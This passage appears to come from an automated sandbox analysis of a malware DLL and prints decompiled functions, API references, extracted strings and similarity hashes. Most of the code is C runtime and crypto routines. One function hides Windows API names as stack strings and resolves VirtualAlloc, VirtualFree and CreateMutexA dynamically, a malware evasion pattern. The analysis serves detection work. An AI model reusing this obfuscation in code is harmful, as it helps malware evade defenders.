				intOrPtr* _t153;
				signed char* _t154;
				signed int _t178;
				signed int* _t179;
				void* _t181;
				void* _t183;
				signed int _t184;

				_t81 =  *0x6f36609c; // 0xe80c9ffe
				_v12 = _t81 ^ _t184;
				_t181 = __edx;
				_t143 = __ecx;
				E6F33D230(__edi,  &_v296, 0, 0x118);
				_t178 =  &(_t143[2]);
				_t143[1] = _t178;
				_t85 = E6F33A140( &_v296, _t181);
				_v300 = _t85;
				if(_t85 == 0) {
					_t151 = _v296;
					 *_t143 = _t151;
					_t153 = (_t151 << 4) + _v292;
					 *_t178 =  *_t153;
					 *((intOrPtr*)(_t178 + 4)) =  *((intOrPtr*)(_t153 + 4));
					 *((intOrPtr*)(_t178 + 8)) =  *((intOrPtr*)(_t153 + 8));
					_t154 = _t153 - 0x10;
					 *((intOrPtr*)(_t178 + 0xc)) =  *((intOrPtr*)(_t153 + 0xc));
					_t179 = _t178 + 0x10;
					_t183 =  *_t143 - 1;
					while(_t183 > 0) {
						_t183 = _t183 - 1;
						 *_t179 =  *(0x6f37e968 + ( *((_t154[3] & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f380690 + ( *((_t154[2] & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37f690 + ( *((_t154[1] & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37fa90 + ( *(( *_t154 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4);
						_t179[1] =  *(0x6f380690 + ( *((_t154[4] >> 0x00000010 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37f690 + ( *((_t154[4] >> 0x00000008 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37e968 + ( *((_t154[4] >> 0x18) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37fa90 + ( *((_t144 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4);
						_t179[2] =  *(0x6f380690 + ( *((_t154[8] >> 0x00000010 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37f690 + ( *((_t154[8] >> 0x00000008 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37e968 + ( *((_t154[8] >> 0x18) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37fa90 + ( *((_t145 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4);
						_t146 = _t154[0xc];
						_t154 = _t154 - 0x10;
						_t179[3] =  *(0x6f380690 + ( *((_t146 >> 0x00000010 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37f690 + ( *((_t146 >> 0x00000008 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37e968 + ( *((_t146 >> 0x18) + 0x6f37e868) & 0x000000ff) * 4) ^  *(0x6f37fa90 + ( *((_t146 & 0x000000ff) + 0x6f37e868) & 0x000000ff) * 4);
						_t179 =  &(_t179[4]);
					}
					 *_t179 =  *_t154;
					_t179[1] = _t154[4];
					_t179[2] = _t154[8];
					_t179[3] = _t154[0xc];
				}
				_t87 =  *0x6f34d168; // 0x6f33d230
				 *_t87(0, 0x118);
				return E6F33C65E(_v12 ^ _t184,  &_v296);
			}

0x6f33b089
0x6f33b090
0x6f33b0a1
0x6f33b0a6
0x6f33b0a8
0x6f33b0b0
0x6f33b0b5
0x6f33b0be
0x6f33b0c6
0x6f33b0ce
0x6f33b0d4
0x6f33b0da
0x6f33b0df
0x6f33b0e7
0x6f33b0ec
0x6f33b0f2
0x6f33b0f8
0x6f33b0fb
0x6f33b0fe
0x6f33b103
0x6f33b106
0x6f33b114
0x6f33b158
0x6f33b1ad
0x6f33b203
0x6f33b206
0x6f33b20e
0x6f33b25c
0x6f33b25f
0x6f33b262
0x6f33b26c
0x6f33b271
0x6f33b277
0x6f33b27d
0x6f33b27d
0x6f33b28e
0x6f33b293
0x6f33b2ae

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063f48083aa79c20478dfd2dec66085f51dd6c4ce114f6d5ebe72a179fa5eee2
Instruction ID: 4b2579114edf8cceb41524137d2d5547d09c1c749a659054ed799c9927e74f83
Opcode Fuzzy Hash: 063f48083aa79c20478dfd2dec66085f51dd6c4ce114f6d5ebe72a179fa5eee2
Instruction Fuzzy Hash: F45142709006B99FDB40DF3AC840A65FBE4EB4A311B4981A9D598CF343C235E5A2CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6F3414AE, Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3414AE(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6F3403AE(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x6f3414bb
0x6f3414bd
0x6f3414c0
0x6f3414c3
0x6f3414c6
0x6f3414d7
0x6f3414d9
0x6f3414c8
0x6f3414cc
0x6f3414d5
0x00000000
0x00000000
0x6f3414d5
0x6f3414e0

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6e38d98d3da71006e7a19da4402c2d27cb404d58e6ce93ddf7320851fb6630
Instruction ID: c1f8a6bbeb9747269da68354cb68a34aa5a878a01efe90dfcb041b5b75dcd066
Opcode Fuzzy Hash: 6d6e38d98d3da71006e7a19da4402c2d27cb404d58e6ce93ddf7320851fb6630
Instruction Fuzzy Hash: D1E08632911638EBCB11DBC9C500999F3FCEB45A11B11019BF904D3210C271DE10C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 6F34429D, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F34429D(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6f366790) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6F33FEFF(_t46);
							E6F344608( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6F33FEFF(_t47);
							E6F344706( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6F33FEFF( *((intOrPtr*)(_t74 + 0x7c)));
						E6F33FEFF( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6F33FEFF( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6F33FEFF( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6F33FEFF( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6F33FEFF( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6F344410( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6f366260) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6F33FEFF(_t31);
							E6F33FEFF( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6F33FEFF(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6F33FEFF(_t74);
			}

0x6f3442a5
0x6f3442a9
0x6f3442b1
0x6f3442ba
0x6f3442bf
0x6f3442c6
0x6f3442ce
0x6f3442d6
0x6f3442e1
0x6f3442e7
0x6f3442e8
0x6f3442f0
0x6f3442f8
0x6f344303
0x6f344309
0x6f34430d
0x6f344318
0x6f34431e
0x6f3442bf
0x6f34431f
0x6f344327
0x6f34433a
0x6f34434d
0x6f34435b
0x6f344366
0x6f34436b
0x6f344374
0x6f34437c
0x6f34437d
0x6f344383
0x6f344386
0x6f344389
0x6f344390
0x6f344392
0x6f344396
0x6f34439e
0x6f3443a5
0x6f3443ab
0x6f3443ac
0x6f3443ac
0x6f3443b3
0x6f3443b5
0x6f3443ba
0x6f3443c2
0x6f3443c7
0x6f3443c8
0x6f3443c8
0x6f3443cb
0x6f3443ce
0x6f3443d1
0x6f3443d4
0x6f3443d4
0x6f3443e6

APIs

___free_lconv_mon.LIBCMT ref: 6F3442E1

Part of subcall function 6F344608: _free.LIBCMT ref: 6F344625
Part of subcall function 6F344608: _free.LIBCMT ref: 6F344637
Part of subcall function 6F344608: _free.LIBCMT ref: 6F344649
Part of subcall function 6F344608: _free.LIBCMT ref: 6F34465B
Part of subcall function 6F344608: _free.LIBCMT ref: 6F34466D
Part of subcall function 6F344608: _free.LIBCMT ref: 6F34467F
Part of subcall function 6F344608: _free.LIBCMT ref: 6F344691
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446A3
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446B5
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446C7
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446D9
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446EB
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446FD

_free.LIBCMT ref: 6F3442D6

Part of subcall function 6F33FEFF: HeapFree.KERNEL32(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

_free.LIBCMT ref: 6F3442F8
_free.LIBCMT ref: 6F34430D
_free.LIBCMT ref: 6F344318
_free.LIBCMT ref: 6F34433A
_free.LIBCMT ref: 6F34434D
_free.LIBCMT ref: 6F34435B
_free.LIBCMT ref: 6F344366
_free.LIBCMT ref: 6F34439E
_free.LIBCMT ref: 6F3443A5
_free.LIBCMT ref: 6F3443C2
_free.LIBCMT ref: 6F3443DA

Strings

`b6o, xrefs: 6F344389

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: `b6o
API String ID: 161543041-86039277
Opcode ID: 5cf8c862c3791666162acd3d14bca8bd67fed9c45e012040db6fbc6339e30c24
Instruction ID: 44b6cbb82f5eb9c9f935fb7ca9da32ef2b8daf1a3c84b6a2d2bd6cec7b533b61
Opcode Fuzzy Hash: 5cf8c862c3791666162acd3d14bca8bd67fed9c45e012040db6fbc6339e30c24
Instruction Fuzzy Hash: 14316D32A04745DFEB249E39D840B8A73E9FF80754F61462AE899DB691DF32F850C720

Uniqueness

Uniqueness Score: -1.00%

Function 6F321305, Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F321305() {
				char _v5;
				intOrPtr _v9;
				intOrPtr _v13;
				char _v17;
				char _v18;
				intOrPtr _v22;
				intOrPtr _v26;
				char _v30;
				char _v31;
				char _v32;
				short _v34;
				intOrPtr _v38;
				char _v42;
				char _v43;
				intOrPtr _v47;
				intOrPtr _v51;
				char _v55;
				char _v56;
				intOrPtr _v60;
				char _v64;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t33;

				_v64 = 0x6e72656b;
				_v60 = 0x32336c65;
				_v56 = 0;
				_v55 = 0x74726956;
				_v51 = 0x416c6175;
				_v47 = 0x636f6c6c;
				_v43 = 0;
				_v42 = 0x74726956;
				_v38 = 0x466c6175;
				_v34 = 0x6572;
				_v32 = 0x65;
				_v31 = 0;
				_v30 = 0x61657243;
				_v26 = 0x754d6574;
				_v22 = 0x41786574;
				_v18 = 0;
				_v17 = 0x4c746547;
				_v13 = 0x45747361;
				_v9 = 0x726f7272;
				_v5 = 0;
				_t21 =  &_v64; // 0x6e72656b
				_t26 = GetModuleHandleA(_t21);
				if(_t26 != 0) {
					_t22 =  &_v55; // 0x74726956
					 *0x6f366064 = GetProcAddress(_t26, _t22);
					_t28 = _t26;
					_t23 =  &_v42; // 0x74726956
					 *0x6f366068 = GetProcAddress(_t28, _t23);
					_t30 = _t28;
					_t24 =  &_v30; // 0x61657243
					 *0x6f36606c = GetProcAddress(_t30, _t24);
					_t32 = _t30;
					_t33 = GetProcAddress(_t32,  &_v17);
					"@Mxt7ce3e80173264ea19b05306b865eadf9" = _t33;
					return _t33;
				}
				return _t26;
			}

0x6f32130b
0x6f321312
0x6f321319
0x6f32131d
0x6f321324
0x6f32132b
0x6f321332
0x6f321336
0x6f32133d
0x6f321344
0x6f32134a
0x6f32134e
0x6f321352
0x6f321359
0x6f321360
0x6f321367
0x6f32136b
0x6f321372
0x6f321379
0x6f321380
0x6f321384
0x6f321388
0x6f321390
0x6f321393
0x6f32139e
0x6f3213a3
0x6f3213a5
0x6f3213b0
0x6f3213b5
0x6f3213b7
0x6f3213c2
0x6f3213c7
0x6f3213cd
0x6f3213d3
0x00000000
0x6f3213d3
0x6f3213d9

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F321388
GetProcAddress.KERNEL32(00000000,VirtualAlloc), ref: 6F321398
GetProcAddress.KERNEL32(6E72656B,VirtualFreCreateMutexA), ref: 6F3213AA
GetProcAddress.KERNEL32(32336C65,CreateMutexA), ref: 6F3213BC
GetProcAddress.KERNEL32(00000000,4C746547), ref: 6F3213CD

Strings

GetL, xrefs: 6F32136B
@Mxt7ce3e80173264ea19b05306b865eadf9, xrefs: 6F3213D3
VirtualFreCreateMutexA, xrefs: 6F3213A5, 6F3213A8
VirtualAlloc, xrefs: 6F321393, 6F321396
astE, xrefs: 6F321372
rror, xrefs: 6F321379
kernel32, xrefs: 6F321384, 6F321387
texA, xrefs: 6F321360

Memory Dump Source

Source File: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: @Mxt7ce3e80173264ea19b05306b865eadf9$GetL$VirtualAlloc$VirtualFreCreateMutexA$astE$kernel32$rror$texA
API String ID: 667068680-3237107477
Opcode ID: 8930f11d1a828a2024604b44b263c1f36a6334e4cbbab1b0bd4711def4c2732b
Instruction ID: 42160fb019ef96c739fead229ba0131238a461c4f0d3bcbf5f2f025f3e764bb1
Opcode Fuzzy Hash: 8930f11d1a828a2024604b44b263c1f36a6334e4cbbab1b0bd4711def4c2732b
Instruction Fuzzy Hash: 182135B1C08748AEEF01EFE4C548BEEBB79EB46750F10815DE441AA254DB758618CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6F340EF4, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F340EF4(void* __edx, void* __esi, char _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;
				void* _t72;

				_t72 = __esi;
				_t71 = __edx;
				_t36 = _a4;
				_t67 =  *_a4;
				_t76 = _t67 - 0x6f348a38;
				if(_t67 != 0x6f348a38) {
					E6F33FEFF(_t67);
					_t36 = _a4;
				}
				E6F33FEFF( *((intOrPtr*)(_t36 + 0x3c)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x30)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x34)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x38)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x28)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x2c)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x40)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x44)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6F340D3C( &_v5, _t71, _t76);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6F340D9D( &_v5, _t71, _t72, _t76);
			}

0x6f340ef4
0x6f340ef4
0x6f340ef9
0x6f340eff
0x6f340f01
0x6f340f07
0x6f340f0a
0x6f340f0f
0x6f340f12
0x6f340f16
0x6f340f21
0x6f340f2c
0x6f340f37
0x6f340f42
0x6f340f4d
0x6f340f58
0x6f340f63
0x6f340f71
0x6f340f7c
0x6f340f84
0x6f340f85
0x6f340f88
0x6f340f8e
0x6f340f92
0x6f340f96
0x6f340f97
0x6f340fa1
0x6f340fa7
0x6f340fa8
0x6f340fab
0x6f340fb1
0x6f340fb5
0x6f340fb9
0x6f340fc2

APIs

_free.LIBCMT ref: 6F340F0A

Part of subcall function 6F33FEFF: HeapFree.KERNEL32(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

_free.LIBCMT ref: 6F340F16
_free.LIBCMT ref: 6F340F21
_free.LIBCMT ref: 6F340F2C
_free.LIBCMT ref: 6F340F37
_free.LIBCMT ref: 6F340F42
_free.LIBCMT ref: 6F340F4D
_free.LIBCMT ref: 6F340F58
_free.LIBCMT ref: 6F340F63
_free.LIBCMT ref: 6F340F71

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7da59faa0b0546ac79af0edef936568c0517d0978ff51792600789429864a52b
Instruction ID: 698e468f3e5bd060473d657e8caa1bd667f0a56f09c73bcaf202dec6484bfe8f
Opcode Fuzzy Hash: 7da59faa0b0546ac79af0edef936568c0517d0978ff51792600789429864a52b
Instruction Fuzzy Hash: E321EA76900298AFCB05EFA8C880DDE7BB9BF48340F5142A6F5559B661DB31EA54CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6F33D3D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F33D3D0(void* __ebx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr* _t67;
				intOrPtr _t71;
				intOrPtr _t73;
				signed int _t75;
				char _t77;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				void* _t110;

				_t71 = _a8;
				_v5 = 0;
				_t93 = _t71 + 0x10;
				_push(_t93);
				_v16 = 1;
				_v20 = _t93;
				_v12 =  *(_t71 + 8) ^  *0x6f36609c;
				E6F33D390( *(_t71 + 8) ^  *0x6f36609c);
				E6F33D717(_a12);
				_t51 = _a4;
				_t102 = _t101 + 0xc;
				_t90 =  *((intOrPtr*)(_t71 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						E6F33D700(_t71, 0xfffffffe, _t93, 0x6f36609c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t71 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t75 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t73 =  *((intOrPtr*)(_t75 + _t58 * 4));
							_t59 = _t75 + _t58 * 4;
							_t76 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t77 = _v5;
								goto L8;
							} else {
								_t60 = E6F33D6B0(_t76, _t93);
								_t77 = 1;
								_v5 = 1;
								_t110 = _t60;
								if(_t110 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									E6F33D390(_v12);
									goto L15;
								} else {
									if(_t110 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6f348a30;
											if(__eflags != 0) {
												_t67 = E6F346B90(__eflags, 0x6f348a30);
												_t102 = _t102 + 4;
												__eflags = _t67;
												if(_t67 != 0) {
													_t97 =  *0x6f348a30; // 0x6f33e30c
													 *0x6f348124(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t102 = _t102 + 8;
												}
												_t61 = _a4;
											}
										}
										E6F33D6E4(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											E6F33D700(_t63, _t90, _t93, 0x6f36609c);
											_t63 = _a8;
										}
										 *((intOrPtr*)(_t63 + 0xc)) = _t73;
										_t64 = E6F33D390(_v12);
										E6F33D6C8();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t98, _t93);
										__eflags = _t64;
										if(_t64 != 0) {
											_push(_t93);
											do {
												_t95 =  *_t64;
												E6F33E93F(_t64);
												_t64 = _t95;
												__eflags = _t95;
											} while (_t95 != 0);
											return _t64;
										}
										return _t64;
									} else {
										goto L8;
									}
								}
							}
							goto L29;
							L8:
							_t90 = _t73;
						} while (_t73 != 0xfffffffe);
						if(_t77 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L29:
			}

0x6f33d3d7
0x6f33d3dc
0x6f33d3e3
0x6f33d3ec
0x6f33d3ee
0x6f33d3f5
0x6f33d3f8
0x6f33d3fb
0x6f33d403
0x6f33d408
0x6f33d40b
0x6f33d40e
0x6f33d415
0x6f33d476
0x6f33d479
0x6f33d488
0x00000000
0x6f33d488
0x00000000
0x6f33d417
0x6f33d417
0x6f33d41d
0x6f33d423
0x6f33d429
0x6f33d499
0x6f33d4a2
0x6f33d42b
0x6f33d430
0x6f33d430
0x6f33d433
0x6f33d436
0x6f33d439
0x6f33d43c
0x6f33d43f
0x6f33d442
0x6f33d447
0x6f33d45d
0x00000000
0x6f33d449
0x6f33d44b
0x6f33d450
0x6f33d452
0x6f33d455
0x6f33d457
0x6f33d46d
0x6f33d48d
0x6f33d48d
0x6f33d491
0x00000000
0x6f33d459
0x6f33d459
0x6f33d4a3
0x6f33d4a6
0x6f33d4ac
0x6f33d4ae
0x6f33d4b5
0x6f33d4bc
0x6f33d4c1
0x6f33d4c4
0x6f33d4c6
0x6f33d4c8
0x6f33d4d5
0x6f33d4db
0x6f33d4dd
0x6f33d4e0
0x6f33d4e0
0x6f33d4e3
0x6f33d4e3
0x6f33d4b5
0x6f33d4eb
0x6f33d4f0
0x6f33d4f3
0x6f33d4f6
0x6f33d502
0x6f33d507
0x6f33d507
0x6f33d50e
0x6f33d511
0x6f33d521
0x6f33d526
0x6f33d52d
0x6f33d533
0x6f33d535
0x6f33d537
0x6f33d538
0x6f33d538
0x6f33d53b
0x6f33d540
0x6f33d543
0x6f33d543
0x00000000
0x6f33d547
0x6f33d549
0x6f33d45b
0x00000000
0x6f33d45b
0x6f33d459
0x6f33d457
0x00000000
0x6f33d460
0x6f33d460
0x6f33d462
0x6f33d469
0x00000000
0x6f33d46b
0x00000000
0x6f33d469
0x6f33d429
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6F33D3FB
___except_validate_context_record.LIBVCRUNTIME ref: 6F33D403
_ValidateLocalCookies.LIBCMT ref: 6F33D491
__IsNonwritableInCurrentImage.LIBCMT ref: 6F33D4BC
_ValidateLocalCookies.LIBCMT ref: 6F33D511

Strings

csm, xrefs: 6F33D4A6

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 745515659c2fe70e0534c2249c81e9af7c9f374acd2f3292b7f9b8123b07e564
Instruction ID: e62480db0368ae6c9a4deb5eac5d2a51f4c1e8867bb5710e5ff9492615aa8578
Opcode Fuzzy Hash: 745515659c2fe70e0534c2249c81e9af7c9f374acd2f3292b7f9b8123b07e564
Instruction Fuzzy Hash: 8341C836E0426CABCF00DF68C840ADEBBB6BF45328F118156D8199B391DB32F915CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F340262, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F340262(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
